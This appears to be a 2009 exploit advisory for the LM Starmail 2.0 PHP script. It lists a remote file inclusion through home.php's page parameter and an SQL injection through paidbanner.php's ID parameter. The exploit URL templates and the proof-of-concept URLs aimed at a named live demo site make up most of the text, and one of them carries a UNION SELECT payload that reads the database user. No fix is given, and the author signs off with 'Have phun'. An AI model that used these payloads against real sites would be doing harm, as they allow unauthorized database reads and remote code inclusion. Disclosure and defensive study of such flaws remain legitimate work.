LM Starmail 2.0 (SQL Injection-File Inclusion) Multiple Vulnerabilities

2009-08-06 17:33:28

_______ ___________
\ _ \ ___ __\_ _____/
/ /_\ \\ \/ /| __)
\ \_/ \> < | \
\_____ /__/\_ \\___ /
\/ \/ \/
#ruling the web since 9/2008


[=] LM Starmail 2.0 (home.php & paidbanner.php) SQL Injection/File Inclusion Vuln

Vendor : http://www.script-shop24.de
Script : LM Starmail 2.0
Download : http://www.script-shop24.de/product_info.php/info/p68_Starmail-2-0-Paidmail.html
Author : int_main();
Contact : someone[at]jabber.ccc.de
Site : 0xFEE1DEAD.de
Greez : BrainWash,Thunderbird,STEAL,The Papst,eddy14,MagicFridge,Patrick B,Hero,tmh,Lorenz,iNs,Cod1K



Exploit:

http://[target]/home.php?page=[evilscript]
http://[target]/paidbanner.php?ID=[sql]

POC:

http://script-demo.eu/Luxusmailer5/home.php?page=http://google.de
http://script-demo.eu/Luxusmailer5/paidbanner.php?ID=-1+union+select+1,2,3,4,5,user(),7,8,9,10--


(File access is unfortunately disabled in this case, otherwise, this inclusion would work because of the coding gap.)

Have phun, wui!

[=]

#

Fixes

No fixes

In order to submit a new fix you need to be registered.